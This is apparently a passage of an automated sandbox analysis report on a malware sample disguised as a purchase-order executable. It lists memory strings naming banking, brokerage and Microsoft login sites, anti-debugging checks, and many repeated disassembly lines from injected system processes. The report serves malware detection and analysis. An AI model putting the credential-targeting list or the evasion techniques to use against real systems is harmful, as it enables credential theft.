Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621013692.0000000000960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,1169648
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: firefox.exe, 0000000A.00000002.2596344085.000001A9F76ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001BEAA2 BlockInput,

0_2_001BEAA2

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_00172622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00172622

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001442DE

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00164CE8 mov eax, dword ptr fs:[00000030h]	0_2_00164CE8
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00F4C7D0 mov eax, dword ptr fs:[00000030h]	0_2_00F4C7D0
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00F4DDE0 mov eax, dword ptr fs:[00000030h]	0_2_00F4DDE0
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00F4DE40 mov eax, dword ptr fs:[00000030h]	0_2_00F4DE40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]	2_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]	2_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]	2_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
